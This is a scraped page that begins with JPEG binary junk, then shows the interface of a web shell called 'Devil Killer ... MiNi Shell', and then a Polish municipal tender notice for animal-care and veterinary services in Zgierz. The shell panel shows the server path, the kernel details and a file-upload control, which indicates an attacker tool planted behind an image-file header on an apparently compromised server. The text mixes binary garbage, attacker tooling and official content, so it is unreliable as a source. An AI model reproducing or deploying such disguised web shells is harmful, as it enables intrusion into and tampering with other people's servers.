JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20221121/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20221121/0044985301-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Zapewnienie opieki zwierzętom z terenu Gminy Miasto Zgierz oraz zapobieganie bezdomności zwierząt na okres 12 miesięcy od dnia 01.01.2023 r. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Miasto Zgierz</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 472057721</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">pl. Jana Pawła II 16</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Zgierz</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">95-100</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">łódzkie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL712 - Łódzki</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia@umz.zgierz.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">bip.zgierz.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Zapewnienie opieki zwierzętom z terenu Gminy Miasto Zgierz oraz zapobieganie bezdomności zwierząt na okres 12 miesięcy od dnia 01.01.2023 r. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-96d6c958-6997-11ed-abdb-a69c1593877c</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00449853</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-11-21</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00067291/13/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">2.3.3 Zapewnienie opieki zwierzętom z terenu Gminy Miasto Zgierz oraz zapobieganie bezdomności zwierząt .</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/umz.zgierz/proceedings <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">platformazakupowa.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wymagania techniczne i organizacyjne opisane zostały w dokumencie &#34;Instrukcja dla wykonawców<br/>platformazakupowa.pl&#34; oraz w „Regulaminie platformazakupowa.pl”</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz 04.05.2016, str. 1), dalej „RODO”, Zamawiający informuje, że:<br/>1) ADMINISTRATOREM PANI/PANA DANYCH OSOBOWYCH jest:<br/>Prezydent Miasta Zgierza, z siedzibą w Zgierzu, plac Jana Pawła II 16, 95-100 Zgierz;<br/>2) w sprawie ochrony swoich danych osobowych proszę skontaktować się z INSPEKTOREM<br/>OCHRONY DANYCH OSOBOWYCH pod adresem e-mail: e-urzad@umz.zgierz.pl<br/>lub epuap.gov.pl skrytka epuap:/4ebn4d0m4f/skrytka; lub pisemnie na adres Urzędu Miasta Zgierza:<br/>plac Jana Pawła II 16, 95-100 Zgierz;<br/>3) Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu<br/>związanym z postępowaniem o udzielenie zamówienia publicznego prowadzonym w trybie<br/>podstawowym z możliwością przeprowadzenia negocjacji treści ofert 4) odbiorcami Pani/Pana danych<br/>osobowych będą osoby lub podmioty, którym udostępniona zostanie<br/>dokumentacja postępowania w oparciu o art. 18 oraz art. 74 ustawy z dnia 11 września 2019 r. –<br/>Prawo zamówień publicznych ,<br/>dalej „ustawa PZP”;<br/>5) Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ustawy PZP, przez okres<br/>4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy<br/>przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy;<br/>6) obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest<br/>wymogiem ustawowym określonym w przepisach ustawy PZP, związanym<br/>z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania<br/>określonych danych wynikają z ustawy PZP;<br/>7) w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób<br/>zautomatyzowany, stosowanie do art. 22 RODO;<br/>8) posiada Pani/Pan:<br/>- na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/>- na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych 2;<br/>- na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych<br/>osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO 3;<br/>- prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że<br/>przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO;<br/>9) nie przysługuje Pani/Panu:<br/>- w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>- prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>- na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż<br/>podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">OR.271.40.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Świadczenie całodobowo usługi weterynaryjnej w przypadkach zdarzeń drogowych z udziałem zwierząt, poprzez dojazd na miejsce zdarzenia i objęcie zwierzęcia opieką weterynaryjną, w razie potrzeby przyjęcie do leczenia wraz z transportem oraz utylizacją zwłok.<br/>1.1.1. Zamówienie obejmuje:<br/>1) utrzymanie całodobowo przez wszystkie dni tygodnia gotowości do świadczenia<br/>usługi i przyjmowanie wezwań kierowanych drogą telefoniczną przez Straż Miejską<br/>w Zgierzu lub wskazanego pracownika Zamawiającego;<br/>2) niezwłoczne przybycie, w czasie nie dłuższym niż 60 minut od chwili otrzymania<br/>wezwania, osoby dysponującej uprawnieniami do wykonania usługi weterynaryjnej<br/>i właściwym sprzętem oraz środkami, na wskazane na terenie Gminy Miasto Zgierz<br/>miejsce przebywania zwierzęcia, w celu:<br/>a) podjęcia właściwych dla gatunku i stanu zdrowia zwierzęcia oraz okoliczności,<br/>w jakich się ono znajduje działań na miejscu zdarzenia poprzez pomoc weterynaryjną<br/>(w tym z użyciem leków),<br/>b) dokonania w uzasadnianych weterynaryjnie przypadkach eutanazji zwierzęcia<br/>w miejscu zdarzenia,<br/>c) utylizacji zwłok zwierzęcia w przypadkach zgonu zwierzęcia, zaistniałego<br/>w trakcie transportu do zakładu leczniczego lub na dalszym etapie świadczonej opieki,<br/>d) uśpienia ślepych miotów urodzonych w trakcie realizacji zamówienia i ich<br/>utylizację,<br/>e) przejęcia do dalszego leczenia w przypadkach takiej potrzeby, wraz z transportem<br/>do zapewnionego przez Wykonawcę :<br/>- schroniska dla zwierząt<br/>- zakładu leczniczego dla zwierząt w przypadku potrzeby zastosowania doraźnego<br/>leczenia zwierzęcia w zakładzie przed przekazaniem do schroniska, gospodarstwa<br/>rolnego lub wypuszczeniem na wolność;<br/>3) transport zwierząt po zakończeniu leczenia w zakładzie leczniczym<br/>do wskazanych przez Zamawiającego:<br/>a) gospodarstwa rolnego* położonego w Zgierzu przy ul. Czerwonej 24,<br/>w przypadku dużych zwierząt gospodarskich,<br/>b) ostoi leśnej*, położonej we wschodniej granicy Leśnego rezerwatu przyrody<br/>„Dąbrowa Grotnicka&#34;, biegnącej wzdłuż oddziałów leśnych 113, 115, 112, i 126 na<br/>terenie leśnictwa Zimna Woda, w przypadku dużych zwierząt dzikich lub innego miejsca<br/>alokacji zwierzęcia,<br/>*Zamawiający zastrzega możliwość zmiany lokalizacji miejsc w trakcie świadczenia<br/>usługi,<br/>4) wypuszczenie do środowiska naturalnego zwierząt małych dzikich po<br/>zakończeniu leczenia (poza kotami wolno żyjącymi),<br/>5) powiadomienie na jeden dzień roboczy wcześniej do godz. 14.00 drogą e-mail<br/>Zamawiającego oraz Straży Miejskiej w Zgierzu o zakończeniu leczenia zwierzęcia<br/>i planowanym czasie transportu zwierzęcia dużego gospodarskiego, celem<br/>powiadomienia przez Zamawiającego osoby prowadzącej gospodarstwo rolne<br/>0 dostarczeniu zwierzęcia przez Wykonawcę ,<br/>6) powiadomienie na jeden dzień roboczy wcześniej do godz. 14.00 podmiotu<br/>wskazanego przez Zamawiającego o zakończeniu leczenia zwierząt małych<br/>gospodarskich oraz kotów wolno żyjących i potrzebie ich odbioru,<br/>7) powiadomienie na jeden dzień roboczy wcześniej do godz. 14.00 drogą e-mail<br/>Zamawiającego oraz Straży Miejskiej w Zgierzu o zakończeniu leczenia zwierząt dzikich<br/>1 planowanym czasie wypuszczenia do środowiska naturalnego, przewiezienia do ostoi<br/>leśnej lub innego miejsca alokacji zwierzęcia, celem ewentualnego uczestniczenia w tych<br/>czynnościach przedstawiciela Zamawiającego. <br/>Pełny opis przedmiotu zamówienia stanowi załącznik do SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">85200000-1 - Usługi weterynaryjne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">98380000-0 - Usługi psiarni</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane <span class="normal">Zamawiający przewiduje udzielanie zamówień polegających na powtórzeniu usług , o których mowa w art. 214 ust. 1 pkt 7 prawa zamówień publicznych, z uwzględnieniem przepisu art. 214 ust. 2 PZP, tj.:<br/> - podobnych i zgodnych z przedmiotem tego zamówienia podstawowego, <br/> w szczególności: wszystkich usług wymienionych w Opisie przedmiotu zamówienia, <br/> - w zakresie sumarycznej wartości do 80.000,00 zł <br/> - na warunkach:<br/> - przez Wykonawcę niepodlegającego wykluczeniu;<br/> - przez Wykonawcę spełniającego, odpowiednio i proporcjonalnie do charakteru i rozmiaru<br/> zamówienia, warunki udziału w postępowaniu;<br/> - z zachowaniem, odpowiednio i proporcjonalnie do charakteru i rozmiaru zamówienia<br/> powtórzonego warunków umowy,<br/> jak w postępowaniu o udzielenie zamówienia podstawowego.<br/>Ww. zamówienia zostaną udzielone na podst. art. 214 ust. 1. pkt 7 po przeprowadzeniu negocjacji <br/>w trybie zamówienia z wolnej ręki z Wykonawcą, którego oferta zostanie wybrana w niniejszym postępowaniu.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy dokonywaniu wyboru najkorzystniejszej oferty zamawiający stosować będzie następujące kryteria oceny ofert: cena, bilbord.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">90</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Bilbord</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Świadczenie w zakładzie leczniczym dla zwierząt usługi weterynaryjnej<br/>obejmującej sterylizację/kastrację kotów wolno żyjących, leczenie kotów wolno<br/>żyjących oraz usypianie ślepych miotów.<br/>1.1.1. Zamówienie obejmuje:<br/>1) sterylizację/kastrację kotów wolno żyjących z jednoczesnym zapewnieniem<br/>po zabiegu opieki weterynaryjnej w czasie nie krótszym niż:<br/>a) samica - 3 dni po zabiegu (licząc wraz z dniem wykonania zabiegu),<br/>b) samiec - 2 dni po zabiegu (licząc wraz z dniem wykonania zabiegu),<br/>2) leczenie kotów wolno żyjących z zapewnieniem całodobowej opieki w trakcie trwania<br/>leczenia, dokonanie eutanazji w uzasadnionych weterynaryjnie przypadkach oraz<br/>zapewnienie utylizacji zwłok,<br/>3) usypianie ślepych miotów wraz z utylizacją.<br/>Pełny opis przedmiotu zamówienia stanowi załącznik do SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">85200000-1 - Usługi weterynaryjne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane <span class="normal">Zamawiający przewiduje udzielanie zamówień polegających na powtórzeniu usług , o których mowa w art. 214 ust. 1 pkt 7 prawa zamówień publicznych,<br/> z uwzględnieniem przepisu art. 214 ust. 2 PZP, tj.:<br/> - podobnych i zgodnych z przedmiotem tego zamówienia podstawowego, <br/> w szczególności: wszystkich usług wymienionych w Opisie przedmiotu zamówienia, <br/> - w zakresie sumarycznej wartości do 20.000,00 zł – dot. cz. II, <br/> - na warunkach:<br/> - przez Wykonawcę niepodlegającego wykluczeniu;<br/> - przez Wykonawcę spełniającego, odpowiednio i proporcjonalnie do charakteru i rozmiaru<br/> zamówienia, warunki udziału w postępowaniu;<br/> - z zachowaniem, odpowiednio i proporcjonalnie do charakteru i rozmiaru zamówienia<br/> powtórzonego warunków umowy,<br/> jak w postępowaniu o udzielenie zamówienia podstawowego.<br/>Ww. zamówienia zostaną udzielone na podst. art. 214 ust. 1. pkt 7 po przeprowadzeniu negocjacji <br/>w trybie zamówienia z wolnej ręki z Wykonawcą, którego oferta zostanie wybrana w niniejszym postępowaniu.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy dokonywaniu wyboru najkorzystniejszej oferty zamawiający stosować będzie następujące kryteria oceny ofert: cena, dodatkowe dni opieki po sterylizacji/kastracji.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">90</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Dodatkowe dni opieki po sterylizacji/kastracji.</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Warunek udziału w postępowaniu dotyczący zdolności do występowania w obrocie<br/>gospodarczym, wg art. 113 PZP, dot. części I oraz części II: Wykonawca prowadząc działalność<br/>gospodarczą lub zawodową jest wpisany do jednego z rejestrów zawodowych lub handlowych<br/>prowadzonych w kraju, w którym ma siedzibę lub miejsce zamieszkania.<br/>Warunek udziału w postępowaniu dotyczący uprawnień do prowadzenia określonej działalności<br/>gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów, wg art. 114 PZP:<br/>Wykonawca posiada:<br/>1) odpowiednie zezwolenie, licencję, koncesję lub wpis do rejestru działalności regulowanej tj.<br/> Dot. cz. I <br/> - decyzję o wpisie schroniska dla zwierząt do rejestru podmiotów prowadzących działalność nadzorowaną prowadzonego przez Powiatowego Lekarza Weterynarii na obszarze jego właściwości;<br/> - wpis do ewidencji zakładów leczniczych dla zwierząt;<br/> - zezwolenie na prowadzenie działalności w zakresie prowadzenia schronisk dla<br/> bezdomnych zwierząt wydane w formie decyzji przez wójta , burmistrza lub prezydenta<br/> miasta właściwego ze względu na miejsce świadczenia usług.<br/> Dot. cz. II <br/> - wpis do ewidencji zakładów leczniczych dla zwierząt.<br/>Warunek udziału w postępowaniu dotyczący zdolności technicznej lub zawodowej, wg art. 116<br/>PZP: Wykonawca dysponuje następującymi narzędziami, wyposażeniem zakładu lub<br/>urządzeniami technicznymi dostępnymi Wykonawcy usług w celu wykonania zamówienia<br/>publicznego, w szczególności:<br/>Dot. cz. I:<br/> - schronisko zapewniające miejsca przebywania, w szczególności psów i kotów, <br/> dla minimum 80 sztuk zwierząt;<br/> - zakład leczniczy dla zwierząt, wyposażony w pomieszczenia, aparaturę, sprzęt <br/> dostosowany do określonego zakresu usług;<br/> - samochód przystosowany do przewozu zwierząt wymagających interwencji <br/> weterynaryjnej;<br/> - czytnik czipów;<br/> - witryna internetowa,<br/>Dot. cz. II:<br/> - zakład leczniczy dla zwierząt, wyposażony w pomieszczenia, aparaturę, sprzęt <br/> dostosowany do określonego zakresu usług;<br/> - czytnik czipów; <br/> - witryna internetowa.<br/>Wykonawca dysponuje osobami, skierowanymi przez Wykonawcę do realizacji zamówienia<br/>publicznego, w szczególności odpowiedzialnymi za świadczenie usług, kontrolę jakości lub<br/>kierowanie robotami budowlanymi, tj.:<br/>dot. części I oraz części II:<br/>- minimum jednym lekarzem weterynarii <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: 